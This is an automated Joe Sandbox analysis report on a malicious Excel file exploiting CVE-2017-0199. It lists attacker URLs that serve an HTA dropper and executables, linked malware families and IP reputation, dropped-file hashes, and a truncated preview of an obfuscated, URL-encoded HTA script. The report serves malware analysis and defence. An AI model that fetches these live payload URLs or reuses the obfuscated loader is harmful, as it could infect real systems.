                              https://contoso.com/Licensepowershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.bookinginfo.asia/pkeZmGiUuTK20.binrmsiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorwlanext.exe, 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wlanext.exe, 0000000B.00000000.437723314.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wlanext.exe.5.dr, walnext[1].exe.5.dr, wlanext.exe.12.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://107.175.113.214/mshta.exe, 00000004.00000002.424201847.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.000000000371E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.000000000371E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://107.175.113.214/902/walnext.exed-powershell.exe, 00000005.00000002.452781154.000000001A64D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://go.microspowershell.exe, 00000005.00000002.444388800.000000000327C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htahttp://1mshta.exe, 00000004.00000003.414513596.0000000002975000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417771297.0000000002975000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htapt-C:mshta.exe, 00000004.00000002.424194140.00000000036CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://nsis.sf.net/NSIS_Errorwlanext.exe, wlanext.exe, 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, wlanext.exe, 0000000B.00000000.437723314.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, wlanext.exe.5.dr, walnext[1].exe.5.dr, wlanext.exe.12.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://107.175.113.214/902/walnext.exeppowershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta...ictiomshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contoso.com/powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.444388800.000000000220C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.452302002.0000000012031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://107.175.113.214/902/walnext.exe9powershell.exe, 00000005.00000002.452781154.000000001A64D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&frictimshta.exe, 00000004.00000003.412834526.0000000000586000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx, C0230000.0.drfalse
                                                    unknown
                                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.bookinginfo.asia/9msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.444388800.0000000002001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.424201847.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.418833365.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414586612.00000000036F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.bookinginfo.asia/msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.414586612.00000000036D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419032600.00000000036D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.424201847.00000000036D7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.626606558.0000000006130000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        188.114.96.3
                                                        qrisni.meEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        199.217.106.226
                                                        bookinginfo.asiaUnited States
                                                        33083AXCELX-NETUSfalse
                                                        107.175.113.214
                                                        unknownUnited States
                                                        36352AS-COLOCROSSINGUStrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1543746
                                                        Start date and time:2024-10-28 11:20:10 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 5s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                        Number of analysed new started processes analysed:19
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • GSI enabled (VBA)
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
                                                        Detection:MAL
                                                        Classification:mal100.phis.spyw.expl.evad.winXLSX@16/31@5/3
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 89
                                                        • Number of non-executed functions: 34
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .xlsx
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Active ActiveX Object
                                                        • Active ActiveX Object
                                                        • Scroll down
                                                        • Close Viewer
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                        • Execution Graph export aborted for target mshta.exe, PID 3612 because there are no executed function
                                                        • Execution Graph export aborted for target msiexec.exe, PID 2100 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
                                                        TimeTypeDescription
                                                        06:21:26API Interceptor56x Sleep call for process: mshta.exe modified
                                                        06:21:30API Interceptor322x Sleep call for process: powershell.exe modified
                                                        06:22:50API Interceptor282x Sleep call for process: msiexec.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        188.114.96.39D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                        DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                        • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                        R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                        • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                        7950COPY.exeGet hashmaliciousFormBookBrowse
                                                        • www.globaltrend.xyz/b2h2/
                                                        transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • paste.ee/d/Gitmx
                                                        19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                        • www.zonguldakescortg.xyz/483l/
                                                        PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                        • www.rtpngk.xyz/876i/
                                                        yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                        • www.fnsds.org/
                                                        rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                        • dddotx.shop/Mine/PWS/fre.php
                                                        Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • paste.ee/d/nwtkd
                                                        199.217.106.226HSBC USD Payment Advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/VrXzVURs233.bin
                                                        HSBC Payment Advice16102024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/MnTuTKfnSsMSP248.bin
                                                        HSBC Payment Advice.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/wTMBlyDGzjY185.bin
                                                        AWB 9869692024 Clearance Doc.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/YBEZddPio157.bin
                                                        Payment Copy 486667.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/larVuzdzFnPsjspJSGQvhHyIW255.bin
                                                        TRIAL_ORDER_OTHERS.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • synexenergygroup.net/PnbzhHImguIPb128.bin
                                                        IMG_INVENTORY_LIST.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • synexenergygroup.net/ZdeTTaG65.bin
                                                        Request For Quotation 34333.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/IRrnYokuAbeBX51.bin
                                                        FedEX Arrival - AWB# 102235508763.exeGet hashmaliciousGuLoaderBrowse
                                                        • www.manjeetsteelproductions.com/fOdHnpSDXn91.bin
                                                        Pepsico Company Profile.exeGet hashmaliciousGuLoaderBrowse
                                                        • www.synergyinnovationsgroup.com/vWyDrlGiCMSupEsdddOxmUDB222.bin
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        qrisni.mePurchase order.xlsGet hashmaliciousLokibotBrowse
                                                        • 188.114.97.3
                                                        Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                        • 188.114.97.3
                                                        Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        PO%20K22012FA[1].docxGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.3
                                                        #PO247762.docxGet hashmaliciousRemcosBrowse
                                                        • 188.114.97.3
                                                        bookinginfo.asiaInventory_list.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 199.217.106.226
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS-COLOCROSSINGUShttps://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 198.23.159.37
                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                        • 192.210.198.196
                                                        jklx86.elfGet hashmaliciousUnknownBrowse
                                                        • 192.3.253.194
                                                        sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 104.168.7.51
                                                        withbest.docGet hashmaliciousRemcosBrowse
                                                        • 104.168.7.51
                                                        seethebestthingswhichgivennewthingswithmewesee.htaGet hashmaliciousCobalt StrikeBrowse
                                                        • 172.245.135.166
                                                        nabx86.elfGet hashmaliciousUnknownBrowse
                                                        • 104.168.50.3
                                                        1HtsNBWaGJT2bGV.exeGet hashmaliciousXWormBrowse
                                                        • 192.3.220.13
                                                        Redoslijed AQW374667.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 172.245.185.139
                                                        transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 107.172.31.13
                                                        AXCELX-NETUStLMlEnMwAm.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 199.217.106.226
                                                        niceworkingwithgreatthingstobeonlineforgoodthing.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
                                                        • 199.217.106.226
                                                        Gwi08LA9Q3.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        ecforyoutomakemegood.htaGet hashmaliciousCobalt Strike, AgentTesla, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousGuLoaderBrowse
                                                        • 199.217.106.226
                                                        HSBC USD Payment Advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        file.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        HSBC Payment Advice16102024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 199.217.106.226
                                                        CLOUDFLARENETUShttps://ipfs.io/ipfs/QmNRd2YnNadczqweR7UkjNBG3cvGj4th37n2oBP7ZKKPD8#test@kghm.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.17.25.14
                                                        https://startuppro.wethemez.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVVXdzRVWEk9JnVpZD1VU0VSMjExMDIwMjRVNTIxMDIxNTI=N0123Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                        • 1.1.1.1
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 188.114.96.3
                                                        https://alinefrasca.sbs/pktcr/Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.91.145
                                                        https://kljhgfdertg7h8uihfgdew34e5rtyuhjiolkjhgfd.pages.dev/?zOTAyMn0.o1hC1xYbJolS=test@kghm.com&h0-bOY230w22zEQSk5TiGet hashmaliciousHTMLPhisherBrowse
                                                        • 104.22.26.101
                                                        Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 104.21.56.189
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.170.64
                                                        https://bitly.cx/NXacYGet hashmaliciousGRQ ScamBrowse
                                                        • 188.114.97.3
                                                        SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                        • 162.159.137.232
                                                        file.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.95.91
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        7dcce5b76c8b17472d024758970a406bcare.rtfGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Purchase order.xlsGet hashmaliciousLokibotBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsxGet hashmaliciousUnknownBrowse
                                                        • 199.217.106.226
                                                        • 188.114.96.3
                                                        No context
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):10112
                                                        Entropy (8bit):4.832569255943436
                                                        Encrypted:false
                                                        SSDEEP:192:Dxoe5wxoe5uVsm5emdwVFn3eGOVpN6K3bkkjo5zgkjDt4iWN3yBGHVbdcU6CYdc1:ZkVoGIpN6KQkj2skjh4iUxVOdB8
                                                        MD5:C4D64B48744582AA6E26276D79F8F528
                                                        SHA1:59530B8F8FF09D00908C98DF925F00D083737D49
                                                        SHA-256:5285082F34E5B2F58E968D239768750D0A04A0BF2327F43FFD744C82D2AB58B1
                                                        SHA-512:CD32FBAB99FE885D9DE09FB8A4E8A61E3332A595A891ED20EAB2E26E02F34813E15F9A6568D20BEA2310CF01C0CB55C6130317AC0DA2115D344DD30EE32C3AE2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Instal
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:@...e...........................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                        Category:modified
                                                        Size (bytes):134243
                                                        Entropy (8bit):2.5170003574717295
                                                        Encrypted:false
                                                        SSDEEP:96:4vCt75+tzZy/7+t6mZy/+faEUo95DEIekqk+tR4+tKJT5QZy/e2T+tdQ:4vCF5yZggZDPBekRDIZiTiQ
                                                        MD5:CF0819EE64763F69ADD5FC1F5FB6CF11
                                                        SHA1:6BD1D9B5061B68A9FC59EDC8A178DCB4D7873233
                                                        SHA-256:DBFF3B816E09FF49FE813026CBD8CF66990EAD2BD86C658581400982108C5FCC
                                                        SHA-512:056FB65CF7E59A6CD3B7B7FB44B2364D6FEFF7FF86AC33EE38845356D05191973207B7C2A97EBC139B3239E0D646C7F9BFBD213FF87557F7BB9AEF4311A6F668
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].hta, Author: Joe Security
                                                        Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCRipt%252520lanGuage%25253D%252522VbsCripT%252522%25253E%25250AdIm%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):738435
                                                        Entropy (8bit):7.94919421571998
                                                        Encrypted:false
                                                        SSDEEP:12288:Mzve08P627lFHqh94GdRwQc6ZvU234p8aHAxPFxImRraIgLNKYJpp/PXpCFWjKIl:cmtPMh94GdRwQcgvvGX+ImRraTLBn0Fo
                                                        MD5:2F9C0BA283506D8333E4F59B29FBEBA3
                                                        SHA1:23BC0A40B6690DAB55D797E9C35CD82D796B85B1
                                                        SHA-256:979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
                                                        SHA-512:A37AABDA8BE17AA24C854996784974A033F724932CAA8BEA4B036E9C60C08B834610BB0D569BD9D7A6CDEE34B921528F969E5A3970F05DF3387F46B80775CBDB
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...9.oZ.................d...|.......2............@..........................p............@.................................4............f...........................................................................................................text....b.......d.................. ..`.rdata..T............h..............@..@.data....U...........|..............@....ndata...................................rsrc....f.......h..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                        Category:dropped
                                                        Size (bytes):172076
                                                        Entropy (8bit):3.1342558498505824
                                                        Encrypted:false
                                                        SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                        MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                        SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                        SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                        SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                        Malicious:false
                                                        Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 28 10:21:37 2024, 1st section name ".debug$S"
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9864342847191736
                                                        Encrypted:false
                                                        SSDEEP:24:HExe9EurusDXdH7wKdNWI+ycuZhN6hYakSLhNPNnqSqd:VrushMKd41ulyYa3VXqSK
